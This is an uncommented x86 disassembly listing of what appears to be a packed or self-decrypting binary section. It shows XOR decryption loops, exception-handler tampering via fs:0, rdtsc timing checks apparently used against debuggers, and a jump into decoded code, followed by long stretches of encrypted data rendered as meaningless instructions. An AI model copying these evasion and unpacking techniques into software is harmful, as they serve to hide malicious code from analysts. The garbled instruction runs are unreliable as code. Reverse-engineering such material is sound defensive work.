		mov	ebx, 0E2h
		push	edi


loc_3142A094:				; CODE XREF: .gda_:3142A0A3j
		xchg	al, [edi]
		xor	ax, bx
		mov	[edi], al
		add	edi, 1
		sub	edx, 1
		or	edx, edx
		jnz	short loc_3142A094
		pop	edi
		mov	ebx, [ebp-8]
		mov	fs:0, ebx
		leave
		jmp	edi
; ---------------------------------------------------------------------------
		db 3 dup(90h)

; =============== S U B	R O U T	I N E =======================================



sub_3142A0B5	proc near		; CODE XREF: .gda_:3142A009p

arg_C		= dword	ptr  10h

		mov	eax, [esp+arg_C]
		pop	dword ptr [eax+0B8h]
		xor	eax, eax
		retn
sub_3142A0B5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dw 0E8h
		dd 8B000000h, 89FC2404h, 2FCB98h, 8680F700h, 28h, 8B800000h
		dd 7404245Ch
; ---------------------------------------------------------------------------


loc_3142A0E0:				; CODE XREF: .gda_:3142A077j
		sub	eax, 0CFB08959h
		das
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------
		push	edi
		pop	dword ptr [eax+2FD3h]
		cmp	byte ptr [eax+288Ah], 0E8h
		jnz	short loc_3142A105
		add	ebx, [eax+288Bh]
		mov	ebx, [ebx+2]
		push	dword ptr [ebx]
		jmp	short loc_3142A10D
; ---------------------------------------------------------------------------


loc_3142A105:				; CODE XREF: .gda_:3142A0F6j
		mov	ebx, [eax+288Ch]
		push	dword ptr [ebx]


loc_3142A10D:				; CODE XREF: .gda_:3142A103j
		pop	ebx
		push	ebp
		mov	ebp, eax
		sub	dword ptr [esp+4], 1EC7h
		sub	ebp, 361005h
		mov	edi, [esp+4]
		lea	esi, [ebp+363898h]
		mov	ecx, 0
		rep movsb
		call	sub_3142A183
		mov	ecx, eax
		call	sub_3142A183
		sub	eax, ecx
		jz	short loc_3142A157
		cmp	eax, 100h
		ja	short loc_3142A157
		lea	eax, [ebp+3610D4h]
		mov	dl, [eax-10h]
		call	sub_3142A187
		jmp	short loc_3142A196
; ---------------------------------------------------------------------------


loc_3142A157:				; CODE XREF: .gda_:3142A13Ej
					; .gda_:3142A145j
		test	dword ptr [ebp+36388Bh], 80000000h
		jz	short loc_3142A181
		lea	esi, [ebp+36388Fh]
		mov	edi, [esp+4]
		movsb
		movsd
		mov	esi, [ebp+363FD4h]
		mov	edi, [ebp+363FD8h]
		mov	ebx, [ebp+363FD0h]


loc_3142A181:				; CODE XREF: .gda_:3142A161j
		pop	ebp
		retn

; =============== S U B	R O U T	I N E =======================================



sub_3142A183	proc near		; CODE XREF: .gda_:3142A130p
					; .gda_:3142A137p
		rdtsc
		retn
sub_3142A183	endp

; ---------------------------------------------------------------------------
		db 0C8h

; =============== S U B	R O U T	I N E =======================================



sub_3142A187	proc near		; CODE XREF: .gda_:3142A150p
		mov	dh, dl
		mov	ecx, 27B7h


loc_3142A18E:				; CODE XREF: sub_3142A187+Cj
		xor	[eax], dl
		inc	eax
		add	dl, dh
		loop	loc_3142A18E
		retn
sub_3142A187	endp

; ---------------------------------------------------------------------------


loc_3142A196:				; CODE XREF: .gda_:3142A155j
		dec	ecx
		jnb	short loc_3142A1F1
		rcl	byte ptr [edi],	1
		dec	edi
		stc
		cmp	eax, [esi-7Ch]
		lock or	[ebx-7Ch], ebx
		mov	al, 1
		mov	ds:68A0D910h, eax
		inc	ebp
		pop	ss
		dec	ebx
		dec	ebx
		push	ebx
		pop	ebx
		fmul	st(6), st
		icebp
		add	[eax-73h], dl
		in	eax, 0B4h	; Interrupt Controller #2, 8259A
		stosd
		mov	eax, 83937BC8h
		mov	ds:0E862EBB8h, al
		mov	ebx, 0DBBD1973h
		arpl	[esi], cx
		mov	cl, 80h
		retn	0FCh
; ---------------------------------------------------------------------------
		dd 829E96Dh, 0D1AB6F3Dh, 52ED543Ch, 13551992h, 7B0C6CB1h
		dd 1311A4CAh, 34DFAF2Bh, 4CF24BB6h
		db 1Bh
; ---------------------------------------------------------------------------


loc_3142A1F1:				; CODE XREF: .gda_:3142A197j
		sbb	esp, [ebx]
		inc	esp
		mov	edi, 54783B03h
		and	al, ch
		mov	al, 3Bh
		sub	al, 67h
		mov	ds:9E4928FDh, eax
		fsub	st(4), st
		sub	eax, 0BE5F8B10h
		mov	ecx, 66B3EE7Dh
		sbb	[eax], cl
		movsd
		jo	short loc_3142A24D
		add	[ebx-63BEC21Eh], cl
		aad	3Dh
		db	36h
		insd
		mov	esi, 0A32821ECh
		inc	edi
		push	esi
		rcl	dword ptr [ebp+305E9BEAh], 10h
		int	88h		; used by BASIC	while in interpreter
		push	eax
		sbb	[edi+617404CDh], ah
		mov	ebx, 9A521DE4h
		fisttp	word ptr [edx]
		inc	eax
		pop	ebx
		das
		dec	esi
		jmp	near ptr 0E7C668F3h
; ---------------------------------------------------------------------------
		dw 0F848h
		dd 3068A31Bh
		db 7Dh
; ---------------------------------------------------------------------------


loc_3142A24D:				; CODE XREF: .gda_:3142A213j
		add	[edi+571F1BD4h], al
; ---------------------------------------------------------------------------
		db 8Fh
		dd 0A65DFF68h, 35E81663h, 518D4FB8h, 7028609Bh,	265DAD05h
		dd 241DA1D8h, 6F587507h, 0FD56E02Eh, 90FE1515h,	0A56CA5D7h
		dd 0D7E3404Eh, 0E5ACC51Bh, 9348808Eh, 67DD47Dh,	0F50BC0F8h
		dd 709EF560h, 0EC6D8338h, 0B0E8164Dh, 28D862Fh,	0F128568Ah
		dd 2B723531h, 85E5A0EEh, 50BED508h, 0CD25292Bh,	90FE3B7Eh
		dd 3B0000E9h, 8F08407Bh, 0CBAEF567h, 0F889808Eh, 0E4ECAFC7h
		dd 0DB88C0F8h, 30C2F45Fh, 90A0C33Bh, 39E02048h,	0E6337EFDh
		dd 9FD80898h, 102280B8h, 0BD63527h, 900DC0CEh, 72466417h
		dd 1D5F0038h, 86F820EDh, 69E7CB78h, 0F0286B64h,	486D39h
		dd 0A5E5A0EEh, 50BED2AAh, 925745EBh, 1BE8ECBBh,	83E04AA4h
		dd 458519B8h, 0F01E7BA1h, 0ECC32B4Bh, 0CE78F751h, 38DFDCBFh
		dd 70A9E01Bh, 0ABF695C7h, 746B206Eh, 0DFC8C558h, 0F02AFF1Ch
		dd 102217B8h, 3000A1B2h, 3808C0FCh, 70A9E018h, 0ABF695C7h
		dd 706D206Eh, 0D28AC477h, 0F0426098h, 1048E8E8h, 3002A0DCh
		dd 7842839h, 18F8E172h,	90C90039h, 8BD6B5A7h, 0DA60404Eh
		dd 0F286198h, 2673BE2Dh, 306D48D8h, 161C0F8h, 1AA8E01Ah
		dd 9A2B5938h, 25172A32h, 0D03E7BCAh, 73EB9173h,	2673DE05h
		dd 0B467A0D8h, 5088C2CCh, 70A8E6F0h, 0D49C4E38h, 4FE86C14h
		dd 0E6333AEDh, 3A9DED98h, 2348B6AFh, 0F6D52D11h, 0E188F6C3h
		dd 3407316h, 13C8003Ah,	86D3DAE5h, 54074078h, 0F0286298h
		dd 2B820533h, 4097A0EEh, 0B20D4FF9h, 0FBA8D62Fh, 0A6F3E2BDh
		dd 0B198DF58h, 0E827C5F7h, 75A360AEh, 107EBB76h, 0BF69D027h
		dd 66B0F67Dh, 0A2256B18h, 73C83603h, 0B199DF42h, 0E84BC5F7h
		dd 7DA360AEh, 107EBB62h, 4197A93Bh, 0D4FF9h, 98A8D620h
		dd 90C80180h, 8CB89DD5h, 1F83404Eh, 29DE60F2h, 934CF047h
		dd 7002A339h, 3ADF39FBh, 0FDB08A18h, 0A6DDD78Dh, 0B0F19958h
		dd 0D4854078h, 0FD79ED5h, 9DE3E647h, 3068EDDCh,	0FBEEC0F8h
		dd 0DBACA795h, 545E40Ah, 0B0DE1AA4h, 0D28126D4h, 32ABCBFEh
		dd 9BBD62BAh, 5868CA0Ch, 5088AF08h, 70C22C93h, 90A2C4B3h
		dd 0B0E82030h, 81482A70h, 0A0260ACAh, 2B9E1547h, 0B330A0EEh
		dd 0A0E0803Ch, 0FBA8E077h, 1BC86AECh, 0DAA84A94h, 820A2A78h
		dd 4060F2h, 7A4880D7h, 0CF02F1D8h, 8E1D3FA8h, 2FA8D623h
		dd 9F378561h, 0B0E927DCh, 0D0BDCD78h, 49285688h, 10488B44h
		dd 959B4F53h, 40882D79h, 0F525E02Eh, 90FE1400h,	0E4B8C0A7h
		dd 2F626012h, 0CBCEF567h, 0D0CD808Eh, 0D85CD587h, 5088C1B5h
		dd 70A8F1F0h, 0D4AD5338h, 0D79D423Dh, 0A6613228h, 974D0CF1h
		dd 0F81F80DDh, 3068A596h, 6FDC7507h, 0E557E02Eh, 90FE3B52h
		dd 9E7DDF0Fh, 0BA087643h, 0F2A0A98h, 2673DE2Dh,	314019D8h
		dd 7B1FC0F8h, 54A469F9h, 537576Ch, 0B0DE1BFAh, 758BB64Bh
		dd 0F01E5CA6h, 0EF1FD4B8h, 653064Dh, 244845F8h,	8E2BA67Eh
		dd 6F26723Ch, 0DAE0042Ch, 2F222A78h, 0C613FE0Dh, 648805B8h
		dd 0B6803304h, 6388C0FDh, 4A4B71D1h, 0ACF68501h, 829D206Eh
		dd 0F42C3CF9h, 835A13FBh, 0D1C9A8CCh, 3068AE4Ch, 6D894A8h
		dd 23F8B049h, 0AB9E95C7h, 706D206Eh, 2F073421h,	7F2044ECh
		dd 2674BE3Dh, 0CDAD48D8h, 0AFDB3F07h, 4693CE8Dh, 1146EB38h
		dd 0B0E9089Ch, 45F71778h, 0F01E5BB6h, 2B661547h, 5881A0EEh
		dd 50773F03h, 1AA88A42h, 0FAC86A38h, 0B0E94858h, 1483407Ch
		dd 9A7860F2h, 0EF8C0BB4h, 6F10F63Ah, 6388C0CCh,	8F7208D1h
		dd 545FFC7h, 0B0DE351Fh, 8059112Ah, 0CB1AF567h,	0D4CB808Eh
		dd 683063F8h, 7F78C0A0h, 7EF7E018h, 90C90038h, 0B0E82058h
		dd 0D0084078h, 0D8A36098h, 104880B8h, 6639A0D8h, 6A1D3FABh
		dd 0DBA8D623h, 504CAC61h, 5E0ADB2Dh, 0A19DCDBBh, 0A2285681h
		dd 2BDA1547h, 0B5E1A0EEh, 50BEFFACh, 70A8F6F0h,	0FFA74C38h
		dd 0E0985533h, 0B97E290Ah, 954F05F4h, 6524E1EEh, 6068E1BDh
		dd 6BB25507h, 0F521E02Eh, 90FE3F60h, 0D1AA7C9Bh, 0B146250Bh
		dd 0BF4C05F5h, 732DEADAh, 6634D3ACh, 33ED938Ch,	3C4E06Ch
		dd 0F5A4724Ch, 0C2AB2036h, 0B57C211Dh, 954409DEh, 620B80F9h
		dd 551CC1BDh, 35E4A9BEh, 0D88155h, 0D1AF6E51h, 0D59A6358h
		dd 806D3419h, 954B0FEAh, 1009F3CBh, 510DD29Bh, 35DAA58Ch
		dd 15DC8F75h, 0F5BA686Ch, 0F3E84439h, 0A469250Ah, 824034FDh
		dd 102CE1DDh, 510DD29Bh, 3FDCA58Ch, 15C08C77h, 0A2FB7054h
		dd 0C0894E0Bh, 0A467280Bh, 99502598h, 6220D4CCh, 300CC1BDh
		dd 35E4A9BEh, 15C5894Ch, 0E99B6F6Ch, 0DD8D542Bh, 0B565292Ch
		dd 955A2698h, 7221CCDDh, 491AC1AAh, 24ED87F8h, 15C4895Eh
		dd 0E2BC7479h, 0C49D4231h, 0D049331Dh, 0B65C05DFh, 432DECD1h
		dd 300DDAB1h, 16FCA5BFh, 24CD8C71h, 90AD6D51h, 0FD9C451Fh
		dd 0BC7D2417h, 9E4928FDh, 512DECDCh, 440DE7D8h,	20E5A5ACh
		dd 15C4895Eh, 0F5A56176h, 0D5AF2019h, 0BD6D140Ch, 844930E8h
		dd 5748C1D0h, 553ED4BDh, 3FE1B38Ah, 15EFE076h, 0E2AD564Ch
		dd 0DE87492Bh, 0D049383Dh, 0A65C05DFh, 7D3DECD7h, 5606E9BDh
		dd 31E5B297h, 1EC7896Ch, 0FF840079h, 0D9A44439h, 0A269321Ah
		dd 0BD2821E1h, 791EF0D9h, 5627D7BDh, 35E4A9BEh,	15D8AF18h
		dd 0FCA14656h, 0C0896D3Dh, 0B7662908h, 806760D9h, 6218EEDDh
		dd 430DC3B7h, 22D8C08Bh, 3CD8377h, 0D6FA334Bh, 0C49B5231h
		dd 0BF7A1078h, 835B05FBh, 7506B28Bh, 6368D4A0h,	39CEB49Dh
		dd 4E98574h, 0F2A1724Ch, 0C38D542Dh, 0B55B4039h, 9C4126ECh
		dd 7D21D4DDh, 5C3BA0BDh, 50F8A59Dh, 4DB994Bh, 0F99C6D5Dh
		dd 0DFBC4535h, 0B564293Eh, 954509CCh, 7D26D5B8h, 593ED0B9h
		dd 36C7B79Dh, 15C4895Eh, 0E2A15638h, 0DC89552Ch, 0BF642C39h
		dd 827F60FBh, 562DF4D1h, 300DCCB1h, 34C9B4B6h, 4DB9572h
		dd 0E6A17268h, 0D78D4C31h, 0BF5C331Dh, 0F04605F3h, 620BF4F6h
		dd 551CC1BDh, 35E4A9BEh, 33DCAE18h, 0E4A9654Ah,	0DF9A703Dh
		dd 0A37B251Bh, 0B35C2E98h, 6429E5CAh, 5F1AF0BDh, 23FBA59Bh
		dd 3EA8985Dh, 0F5BA434Ch, 0E38D5439h, 0B97C231Dh, 0BE280EF7h
		dd 753AC3CCh, 650DD4B9h, 0FAA58Bh, 15CB8F6Ah, 0DEC8734Bh
		dd 0C0896D2Ch, 0A76D292Eh, 957B06D7h, 7F21F4DBh, 4426A0B6h
		dd 3EEDB0B7h, 15C4895Eh, 0DFBC4E38h, 0E0864528h, 0B56B2F0Ah
		dd 9F7C13EBh, 1026E5D3h, 4027D496h, 35DBAE9Dh, 1FC1947Bh
		dd 0E4860056h, 0C4875208h, 867C231Dh, 855C12F1h, 7505ECD9h
		dd 491ACFB5h, 1FC8EF8h,	9DA856Dh, 0FFAE6E71h, 0C4894D2Ah
		dd 84662F11h, 9E4D0BF7h, 473CCEB8h, 551CC9AAh, 24FAA9AEh
		dd 3DC4816Dh, 0E2A76D5Dh, 0C4BA2021h, 0B9661514h, 954C0FFBh
		dd 793AF4EBh, 5F3CC7B6h, 39FBAEB9h, 19DA944Bh, 0C7C86756h
		dd 0C4BB610Bh, 0A57C3219h, 9C4B60E8h, 632DF3D7h, 5503C3B7h
		dd 3FEBC08Ch, 13CD8E76h, 0F5AF004Ch, 0C387482Ch, 0BE71220Ch
		dd 0F04D0DF9h, 662BE5CAh, 5E0DD3D8h, 3FFBC09Ch,	4CD8B7Bh
		dd 0E4A64938h, 0D586523Dh, 0BF64030Ch, 916005EBh, 7524E4D6h
		dd 4406E9D8h, 35E6B29Dh, 4CDA76Ch, 0FEA66F7Bh, 0D59C433Dh
		dd 0B17C131Ch, 0B92805ECh, 622DF4D6h, 7F1CC5B6h, 11E6A588h
		dd 4C6A918h, 0F5A6725Dh, 0D5986F2Ch, 0BC7A1516h, 9E6160D9h
		dd 7E3AE5CCh, 553AD4BDh, 39CEA499h, 31A88574h, 0C089567Ch
		dd 9EDA1311h, 0D0440C3Ch, 0B34F05CAh, 753BEFD4h, 3011C593h
		dd 1FEFA5AAh, 3BC68568h
		dd 0E88D795Dh, 0D5BA2019h, 0B57D111Fh, 917E19EAh, 552DF5D4h
		dd 6268E1A0h, 35DBA79Dh, 1CC9B66Ch, 0E88D654Dh,	83BE2019h
		dd 860A2A8Eh, 9AFCEBCEh, 62B7D2B9h, 0A597F6C0h,	50BEFFA0h
		dd 26FE2493h, 6F9E506Eh, 25173828h, 0D03E7BBEh,	0AE38A41Bh
		dd 9D48887Ah, 0F8435B91h, 5088A8A9h, 3C250818h,	90A2031Ch
		dd 0E0B92532h, 5B0D2A2Bh, 24A33054h, 5022D4E8h,	0CF3BF289h
		dd 66B32E6Dh, 7C6C6318h, 0AB3E95C7h, 746B206Eh,	45858370h
		dd 0F01E5A64h, 1022498Bh, 3058C88Ah, 9403C0CAh,	30C2B149h
		dd 88A25168h, 0E4E0E0DBh, 2F584E12h, 0C6138A0Dh, 308C03B8h
		dd 0F0ED72EBh, 0A74A59F7h, 0B28BB8C2h, 6FFB57FBh, 4F17E1B0h
		dd 758C4F87h, 0A0286098h, 102770D0h, 5ABC2BD8h,	3A444BF8h
		dd 70A88858h, 92A20028h, 0D8E84A0Ah, 0D0082F88h, 0A37960F2h
		dd 0CEDD7FE8h, 6F6896E3h, 7E1D3FA1h, 0F5A8D623h, 1BB974C7h
		dd 86FD5CD5h, 5D04A378h, 0C638600Dh, 479983B8h,	0BBBA5F8Bh
		dd 66B30A7Dh, 91276D18h, 78C8001Fh, 4F17DF73h, 0EBEAC5F3h
		dd 7FA560AEh, 1048A896h, 0CF97BA30h, 9E0D4B07h,	0FDA8D623h
		dd 90E035B7h, 4FE1C858h, 5583BF87h, 0F01E5B4Ah,	303C403Dh
		dd 182A2F55h, 0A460C0F8h, 0FB571FE6h, 0A6F3DABDh, 0C428A558h
		dd 9F87CD73h, 182860B0h, 0EFB77E67h, 0F3376753h, 508828ADh
		dd 0F1F5E018h, 0A6D310D5h, 3D211358h, 0E616D4FDh, 0A17C3198h
		dd 4119D0E9h, 0B323527h, 540FC0CEh, 5E3D1F3Ch, 0CDC83603h
		dd 0E5E8249Ah, 0D0084090h, 1DA93D98h, 107E9B87h, 0A5E55FB2h
		dd 50BEDBF2h, 5065B248h, 90E2001Ch, 0D6E4E4DBh,	0CB58C5BFh
		dd 0D0E560AEh, 0B1A057Fh, 304CA0EEh, 93D5C0D2h,	98F0FA72h
		dd 90C80031h, 1A8962D5h, 207D8986h, 0B8BD095Bh,	1548B684h
		dd 7260A85Ch, 6CC05571h, 925FE02Eh, 902055FBh, 0EDE82058h
		dd 0CB91ADF9h, 6DA360AEh, 107EBCF4h, 384CDC5Bh,	0E90CCFF8h
		dd 0F1A8E018h, 90CA08D4h, 0B4807458h, 2F084079h, 0C613E20Dh
		dd 9DB40BB8h, 316C845Ch, 3AD8C0F8h, 70AC0818h, 0C29E0038h
		dd 4FBF200Ah, 0E6333EEDh, 7DE15398h, 1049842Fh,	5A39F1D8h
		dd 51E291FAh, 70A8E070h, 5375278h, 0B0DE1B12h, 0A4FEC5EEh
		dd 987C30C3h, 104881BCh, 14DC5F8Fh, 5088C2D8h, 4C8275E7h
		dd 1591000Eh, 53FE5498h, 483106Ch, 0A17A60F2h, 85B7D6EFh
		dd 305E9B1Ah, 254845A1h, 0E557B6C8h, 90FE3B16h,	0E2AC77D5h
		dd 884C2A2Fh, 0F12CF715h, 23E380B8h, 6978CA18h,	0D86B0Bh
		dd 20F8B048h, 5375268h,	0B0DE1B0Ah, 0D20084F9h,	84D76098h
		dd 85B7889Ch, 305E9CC2h, 4A1D3FABh, 2DA8D624h, 10C804FAh
		dd 0B19D2A66h, 0A885CB3Eh, 1328568Dh, 10DD0DA1h, 336896C8h
		dd 82779629h, 0F8A7209Ch, 90C80127h, 0B1F8A457h, 0EE884078h
		dd 0B63815A2h, 1F48BE38h, 3069A15Ch, 70B640F8h,	0F1EE116Dh
		dd 0DE815006h, 3BAA551Fh, 0D14E86B7h, 0A1E64BD7h, 461980D2h
		dd 22FD5F8Bh, 988F6C4h,	0F5A72123h, 90C800E7h, 0AE60A5D5h
		dd 0D062404Eh, 0F0286CF0h, 0EF1BD0B8h, 654B24Dh, 5084FDF8h
		dd 0F5A7E018h, 90C80087h, 0B0E891B1h, 8036C178h, 0FF7E29CAh
		dd 1048253Dh, 38AE23D8h, 5F85FC54h, 70A8799Ch, 0E5E83C38h
		dd 8AD48CABh, 0D084C577h, 0FD856098h, 3068A098h, 550F81E5h
		dd 0FCF7B58Ch, 0CDDC024h, 0B0377EB9h, 0C59C5430h, 0D376C109h
		dd 0DF075AE8h, 578EE8CDh, 167A027h, 50AFD042h, 224A1718h
		dd 0AB7A95C7h, 70DB206Eh, 80581028h, 0F0286970h, 6727C4B8h
		dd 5107CCB6h, 0C577C09Ch, 709EDC3Ah, 0A6BCC0BDh, 3561E96Bh
		dd 0D03E7C34h, 0F22808C9h, 411900B8h, 0A597F08Eh, 50BEFCDEh
		dd 6B3B7595h, 0A398000Eh, 0E0B97491h, 2F59112Ah, 0C6133A0Dh
		dd 344C07B8h, 0B463527h, 9370C0CEh, 65C36D98h, 69C9000Eh
		dd 0DAE94A9Bh, 2F3BBF79h, 0E5D764EBh, 4A3C403Dh, 0E0E37BEBh
		dd 8BCB4Bh, 0C71D6D24h,	1BC83625h, 0B0E92CE2h, 0D882CB78h
		dd 0F3286099h, 7083AB40h, 969B6B53h, 178DB499h,	5E4315FAh
		dd 0C3C7C7BBh, 3BBFECD3h, 0BA5C10ACh, 9A7A31D8h, 0FEDD7F47h
		dd 0BB6896E3h, 66B3A275h, 7C6C6318h, 794BCF13h,	0DAEFE75Fh
		dd 5908A878h, 0A3EB63D7h, 471CC6F7h, 6C2DF299h,	22EBA9B5h
		dd 16C79377h, 0F99F5C4Ch, 0C7874436h, 0A54B1C0Bh, 9E4D12EAh
		dd 622DD6CCh, 5E07C9ABh, 20F085A4h, 15DA8F74h, 0F19C004Ah
		dd 0C48D472Ah, 0A47B2F30h, 0F0286298h, 1048FFE8h, 531AC9D9h
		dd 39F2EE9Ch, 86867Dh, 0D9860054h, 0D7C86B1Bh, 0BA6D251Fh
		dd 0FA4503FBh, 420DD3EDh, 7F22D5F8h, 76A88EB1h,	4DA896Eh
		dd 789D0A4Dh, 0B0E82058h, 4AE5C125h, 36285686h,	265DEB3Dh
		dd 0A597A0D8h, 50BEFB7Eh, 4B708D9h, 1BD66A04h, 86D31EEDh
		dd 0ECA41978h, 960215B6h, 0DB7BE39h, 8DE583ADh,	50BEFCBAh
		dd 27AA9693h, 1D6D669Dh, 86DF97DDh, 0D8DCF78h, 0A2856AFh
		dd 9CB2C631h, 81935E96h, 0BB4722F9h, 8B800848h,	0EC4BFFC7h
		dd 0C5EC287Ch, 0D000A83Ch, 0B67B6098h, 5C0CAEFBh, 0A597A094h
		dd 50BEFB6Ah, 7DDC2013h, 0C3CA6AABh, 8BD2B5A7h,	0F7404Eh
		dd 0EB6880Bh, 1BA07F47h, 6368A0D8h, 1FD783BEh, 3CECCE4Bh
		dd 5370074h, 0B0DE1BCAh, 2FF6C390h, 6218867h, 9DB77F47h
		dd 305EB20Ah, 0D50509CBh, 709EDFF4h, 0C1995169h, 0E1B97108h
		dd 0EB86D587h, 0FBC060AEh, 454880B8h, 33AE58Bh,	1CCCEECAh
		dd 0E557E054h, 90FE3BAAh, 0B0E82AB0h, 0A07B3778h, 844609EAh
		dd 4048C1DEh, 0B523527h, 0D501C0CEh, 709EDB5Ah,	1D453137h
		dd 0B0DE3929h, 0EC40C5F1h, 0F7960AEh, 2673122Dh, 340033D8h
		dd 0DD88C0F8h, 46B19EADh, 2D455938h, 0B0DE1C76h, 2FFD8990h
		dd 75EF0667h, 107E9ED9h, 95EBF0D8h, 50BEDE9Bh, 513D6D18h
		dd 0C0C83626h, 0DAE94A0Ch, 0D2601278h, 0FA86098h, 2674B22Dh
		dd 6AA825D8h, 0DD05E28Dh, 709EFE4Ch, 1DCE6A6Ah,	86F641EDh
		dd 805E1478h, 0F7A31C8h, 2674B62Dh, 0A597F8D8h,	50BEFCD6h
		dd 4EE765DEh, 78C8000Eh, 0B0E82054h, 9347132Fh,	0DE1A53D3h
		dd 1004CCFCh, 0BFA3527h, 381BC0CEh, 70A8E01Fh, 881DB5B5h
		dd 3DB1206Eh, 0E633BEC5h, 56C8898h, 1CA07F47h, 6768A0D8h
		dd 1EC18EB1h, 3486B45Dh, 6FC84C74h, 86D3B2CDh, 0DFC8C578h
		dd 0F02A551Ch, 152013B8h, 0BD68A0D8h, 6691D34Dh, 0CD25B918h
		dd 90FE3C22h, 4F1D2DB0h, 0CEB5C387h, 0F02856A4h, 125804B7h
		dd 0DCE9A0D8h, 5088C168h, 71A9884Ch, 5370038h, 0B0DE1BA6h
		dd 0D19884F9h, 7B786098h, 4248EA6Ch, 0C763527h,	900DC0CEh
		dd 18A59541h, 90C813B0h, 8B5AB5A7h, 32E3404Eh, 0EE4BDD1Bh
		dd 6548808Eh, 57ED2DF1h, 88F6E6h, 4CA275E7h, 504D000Eh
		dd 0B161A457h, 90834078h, 0F28EB94h, 73CD0F88h,	0F66896C6h
		dd 66B68F7Dh, 70C2E118h, 92A20152h, 8CFEB5A7h, 288B404Eh
		dd 90AC6F67h, 834880B9h, 2E373555h, 40E2C0CEh, 0E557B34Ah
		dd 90FE3C3Eh, 35E7E0DDh, 0D0084138h, 0EE51DD15h, 18F9808Eh
		dd 0CF92E330h, 501CA807h, 5BF6E018h, 0B4FC89DEh, 3A7DDF0Ch
		dd 5D087643h, 0C636E725h, 0F84931B8h, 0CF975AFCh, 4EFC5575h
		dd 70C2E02Eh, 90C81450h, 4FBB7258h, 0E63452EDh,	0D46CED98h
		dd 0FCDD0DACh, 606896E7h, 0DB8276F7h, 0B1BCC45Ch, 0DACA08D8h
		dd 0B2A23259h, 0DB0B0A6Ah, 702044DCh, 0F0898F59h, 7463F1D0h
		dd 6277D0DCh, 20156D48h
		dd 78C83604h, 0B0E82044h, 0A83E6E5Dh, 0DE084EB8h, 356DBA98h
		dd 48508EFDh, 75A8B8DDh, 3FE2EA6Bh, 90E84E71h, 0F27DDF0Fh
		dd 51087643h, 0F028CC5Ch, 4048EAB8h, 0A597F38Fh, 50BEFCEAh
		dd 652C6D93h, 90A2000Eh, 79833BBBh, 0D5E01175h,	0D6286098h
		dd 1042E49Dh, 72FD5F8Fh, 0D388F6C3h, 9BF8ECDCh,	90CF6833h
		dd 0D652058h, 0D03E5EF5h, 65D733CFh, 107EBCAAh,	6416605Dh
		dd 6CD87575h, 0D52BE02Eh, 90FE15BCh, 0FF65AD58h, 0FB087646h
		dd 0A1280A56h, 85B7D3EEh, 305E9CD6h, 2E88387Bh,	8E237137h
		dd 0AC98B5B5h, 0BD58206Eh, 0C07DEE8Ah, 0A1988F8h, 62297F47h
		dd 0BD6143CFh, 0BA63C18Fh, 0BE832F93h, 0AC98BDB5h, 141B206Eh
		dd 69E3B7FFh, 0F2BD9FCBh, 9048B684h, 67DCB65h, 7AFCC1F8h
		dd 70DDD070h, 225DFF38h, 30E81663h, 0E6360FC5h,	0E15C6098h
		dd 0E2B057Fh, 3068A0EEh, 0D54EC0F8h, 709EDE57h,	6EC0E938h
		dd 352FDFA7h, 0D03E550Ch, 70286098h, 104C42E5h,	1027AAD5h
		dd 3EE7AF96h, 50CE8F38h, 0F5AE6954h, 90A70079h,	0B565290Ch
		dd 0D04714B8h, 7524E5DBh, 4409D2BAh, 5A85E19Dh,	5088C038h
		dd 0E3E84F18h, 0D5854D2Dh, 0B16F600Ah, 9E4D04EAh, 42428D99h
		dd 5E0DCCBDh, 23EDAC8Ch, 50D18C6Bh, 0E0B86150h,	0DE890021h
		dd 0A86D601Ch, 844B05E8h, 3C3CEED9h, 511CD3F8h,	3EE1A496h
		dd 5D88DA7Fh, 0F19F0A35h, 0D980432Ch, 0B1282716h, 94080CF4h
		dd 7168F9D9h, 5E48C4B6h, 24E0A791h, 1FCEC034h, 0E2AE204Ah
		dd 0D4864531h, 0F041600Bh, 844101EFh, 47428D82h, 551AC5B0h
		dd 35FAA1D8h, 5C79938h,	0E2AE2014h, 0D4864531h,	93287F0Bh
		dd 0D14D0DF7h, 303CC998h, 4448D3B1h, 71EDAD91h,	57DCA938h
		dd 0F1A4204Bh, 0B4C9452Ch, 983887FCh, 696857CAh, 39930533h
		dd 247806CCh, 0B83580F9h, 0A02BB2AAh, 0C7823BC5h, 22D28B01h
		dd 0E0D12485h, 0D5480E77h, 61E9B5D6h, 30B3C905h, 5088C0F8h
		dd 70A8E018h, 90C80038h, 0B0E82058h, 0D0084078h, 0F0286098h
		dd 104880B8h, 3068A0D8h, 5088C0F8h, 70A8E018h, 90C80038h
		dd 0B0E82058h, 0D0084078h, 0F0286098h, 104880B8h, 3068A0D8h
		dd 5088C0F8h, 70A8E018h, 90C80038h, 0D0E82058h,	0EFB4E5FBh
		dd 732860AEh, 2677401Dh, 8767A0D8h, 305D4BBh, 3B1FEF00h
		dd 1B18033Eh, 9BCC041Ch, 0C97A4C3Ah, 832022A3h,	40A0BACh
		dd 0B964E2F3h, 66B77C6Dh, 0B02D6918h, 7BC83607h, 982AA35Dh
		dd 1269999Ah, 75A0609Ch, 107EA4F4h, 3068C430h, 5097A8F8h
		dd 0F525E018h, 90FE2341h, 0C4F01901h, 0D4C8C374h, 75D7977Ah
		dd 107EBF24h, 33B1571Bh, 66AC8C75h, 8FB80318h, 9047FC48h
		dd 52ECC8DBh, 0A995C98Eh, 732856BBh, 153C8082h,	426B92F3h
		dd 0ACC64DE8h, 0F3F6BB40h, 94BC0002h, 0B30312A7h, 38183287h
		dd 0FD79FCFh, 9D634E93h, 305E9F18h, 64C3C3A0h, 0D02D6FDBh
		dd 57C83607h, 86D7BCDDh, 0D0084078h, 0F0148898h, 95C380B8h
		dd 305E9F44h, 0AF7E7010h, 70B008E7h, 2D4B0038h,	0B0DE1FC4h
		dd 59003578h, 0C60B9505h, 0EFD46BB8h, 6573C55h,	0D50703F8h
		dd 709EDFB8h, 0AF5495B1h, 0B300206Eh, 0E3084078h, 63A3A351h
		dd 10488038h, 0CE85488Ah, 0C58B3F07h, 709EDFD8h, 0EA4BD63Bh
		dd 34E72054h, 0D008417Fh, 0F0381A1Bh, 10B504B7h, 72E3A0D8h
		dd 986090F4h, 73571FE6h, 0A6F7C0BDh, 0E02E2358h, 298848F2h
		dd 70311498h, 133CAE41h, 0BB994B98h, 0B109C1B0h, 0AF773FC7h
		dd 0DC8CF9B9h, 5C9D2014h, 53C06B21h, 7F279A61h,	1048800Fh
		dd 0CE1021BEh, 0D587F2CBh, 70A8E0B3h, 90F2836Eh, 0FA63252Dh
